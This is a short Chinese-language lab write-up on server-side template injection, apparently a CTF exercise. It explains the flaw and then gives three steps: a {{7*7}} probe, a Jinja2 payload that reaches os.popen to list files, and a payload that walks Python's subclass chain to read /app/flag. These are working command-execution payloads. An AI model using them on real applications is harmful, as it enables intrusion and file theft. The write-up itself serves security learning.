實驗說明 - ssti

Yolololololo發表於2024-07-24

實驗名稱

簡單的ssti

實驗簡介

是一種針對伺服器端模板的注入漏洞。

實驗說明

攻擊者 將惡意程式碼輸入到模板 伺服器在執行時未對惡意程式碼進行處理 就輸出執行

將字串 當作模板執行

ssti注入就是使其渲染我們想要執行的的字串

實驗步驟

步驟一:

輸入 {{7*7}}判斷型別

image-20240724190317753

步驟二:

{{url_for.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

image-20240724203119223

步驟三:

{{' '.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /app/flag').read()}}

image-20240724203344756